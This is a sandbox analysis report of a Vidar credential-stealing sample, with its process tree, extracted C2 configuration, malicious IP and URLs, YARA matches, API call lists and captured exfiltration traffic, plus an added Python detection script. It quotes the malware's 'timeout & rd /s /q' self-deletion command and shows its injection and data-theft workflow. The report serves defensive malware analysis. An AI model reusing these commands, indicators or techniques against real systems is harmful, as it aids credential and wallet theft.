Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1442218
MD5: b580ff2d001291bf58bdd23a058ef21b
SHA1: 5013dc6e38bd9d1cbe2f7fc0d983b6812f3f2351
SHA256: 80994b791b545ba6a8c906e046ab6ae79c5875a4f42da07085113b4b6f22f8ca
Tags: exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B580FF2D001291BF58BDD23A058EF21B)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 3272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 2860 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2116 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
Malware configuration (extracted): {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
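The process tree above tells the whole story of this sample in three steps: the packed file.exe starts RegAsm.exe twice with no arguments (the "Creates a process in suspended mode" and "Injects a PE file into a foreign process" signatures; the YARA hit on 3.2.RegAsm.exe.400000.0.raw.unpack shows the Vidar PE sitting at RegAsm's image base), the second RegAsm.exe runs the stealer, and on exit it spawns cmd.exe /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit to wipe its working directory. The Python below is an added detection example, not part of the Joe Sandbox report: it models these events as constructed process-creation records (PIDs, images and command lines are taken from the tree; the parent PID 1000 for file.exe and the final benign RegAsm invocation are assumptions added as a control) and flags RegAsm.exe started without an assembly argument and a cmd.exe timed rd /s /q cleanup, noting whether the cleanup's parent is one of the flagged hosts.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (what Sysmon event 1 or a sandbox tree gives you)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
CONHOST = r"C:\Windows\system32\conhost.exe"

# Constructed events modelled on the process tree in this report. PIDs, images and
# command lines are the report's; parent PID 1000 and the last (benign) RegAsm
# invocation are assumptions added as a control case.
EVENTS = [
    ProcEvent(6856, 1000, r"C:\Users\user\Desktop\file.exe", r'"C:\Users\user\Desktop\file.exe"'),
    ProcEvent(6860, 6856, CONHOST, CONHOST + " 0xffffffff -ForceV1"),
    ProcEvent(3272, 6856, REGASM, f'"{REGASM}"'),
    ProcEvent(5984, 6856, REGASM, f'"{REGASM}"'),
    ProcEvent(2860, 5984, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit'),
    ProcEvent(3412, 2860, CONHOST, CONHOST + " 0xffffffff -ForceV1"),
    ProcEvent(2116, 2860, r"C:\Windows\system32\timeout.exe", "timeout /t 10"),
    ProcEvent(7000, 1000, REGASM, rf'"{REGASM}" C:\dev\MyComLib.dll /codebase'),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline: str) -> str:
    """Strip the leading image token (quoted or bare) and return the remaining arguments."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) == 2 else ""


# timeout /t N & rd /s /q "<dir>": wait for the parent to exit, then delete its
# working directory. Scripts rarely chain exactly this from a cmd /c one-liner.
SELF_CLEANUP_RE = re.compile(
    r'timeout\s+/t\s+(?P<delay>\d+)\s*&\s*rd\s+/s\s+/q\s+"(?P<path>[^"]+)"',
    re.IGNORECASE,
)


def find_alerts(events):
    """Return (pid, rule, detail) tuples for the two behaviours visible in this tree."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    flagged_hosts = set()

    # Rule 1: RegAsm.exe registers a COM assembly, so a real call always carries at
    # least the assembly path. A bare invocation only makes sense as an injection host.
    for e in events:
        if basename(e.image) == "regasm.exe" and args_after_image(e.cmdline) == "":
            flagged_hosts.add(e.pid)
            parent = by_pid.get(e.ppid)
            alerts.append((e.pid, "regasm_no_arguments",
                           f"parent={basename(parent.image) if parent else '?'}"))

    # Rule 2: timed self-cleanup through cmd.exe, weighted up when its parent is a
    # host already flagged by rule 1.
    for e in events:
        if basename(e.image) != "cmd.exe":
            continue
        m = SELF_CLEANUP_RE.search(e.cmdline)
        if not m:
            continue
        linkage = "parent_is_flagged_host" if e.ppid in flagged_hosts else "parent_not_flagged"
        alerts.append((e.pid, "timed_self_cleanup",
                       f"rd {m['path']} after {m['delay']}s; {linkage}"))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in find_alerts(EVENTS):
        print(f"PID {pid}: {rule} ({detail})")
```

Run against the constructed tree this flags PIDs 3272 and 5984 (bare RegAsm.exe) and PID 2860 (cleanup of C:\ProgramData\GHIJJEGDBFII after 10 s, parent flagged), and stays silent on the control RegAsm call that registers an assembly.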
Yara matches: PCAP
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security

Yara matches: memory dumps
Source | Rule | Description | Author
00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
(6 entries in total; remainder not shown)

Yara matches: unpacked PE files
Source | Rule | Description | Author
0.2.file.exe.70aac0.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.file.exe.70aac0.1.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x201f0:$s1: JohnDoe
  • 0x201e8:$s2: HAL9TH
3.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen
  • 0x221f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x221e8:$s2: HAL9TH
0.2.file.exe.70aac0.1.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
(5 entries in total; remainder not shown)

No Sigma rule has matched
No Snort rule has matched


AV Detection

Source: file.exe | Avira: detected
Source: https://steamcommunity.co | Sophos S4: Label: illegal phishing domain
Source: https://95.217.240.101/nss3.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/nss3.dll2 | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/freebl3.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/softokn3.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/msvcp140.dllU | Avira URL Cloud: Label: malware
Source: https://95.217.240.101 | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/freebl3.dlls | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/msvcp140.dll | Avira URL Cloud: Label: malware
Source: https://steamcommunity.co | Avira URL Cloud: Label: phishing
Source: https://t.me/k0mono | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199686524322/badges | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199686524322/inventory/ | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/mozglue.dll | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/softokn3.dllK | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/sqlx.dll | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199686524322 | Avira URL Cloud: Label: malware
Source: https://95.217.240.101/v | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E22BA FreeConsole,GetCurrentThreadId,PostQuitMessage,GetClipBox,CryptDecrypt,std::_Throw_Cpp_error,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C6D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C82A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C8244C0 PK11_PubEncrypt,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C7F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C824440 PK11_PrivDecrypt,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C8725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C80E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C82A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C808670 PK11_ExportEncryptedPrivKeyInfo,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_6C84A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP | source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb | source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp | source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ | source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: softokn3.pdb@ | source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb | source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb | source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb | source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb | source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr
Source: Binary string: mozglue.pdb | source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: softokn3.pdb | source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F81B2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199686524322
Source: global traffic | HTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 23.194.234.100
Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 279 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAF | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 7081 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /sqlx.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJ | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 4677 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 1529 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGD | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1 | Host: 95.217.240.101 | Cache-Control: no-cache
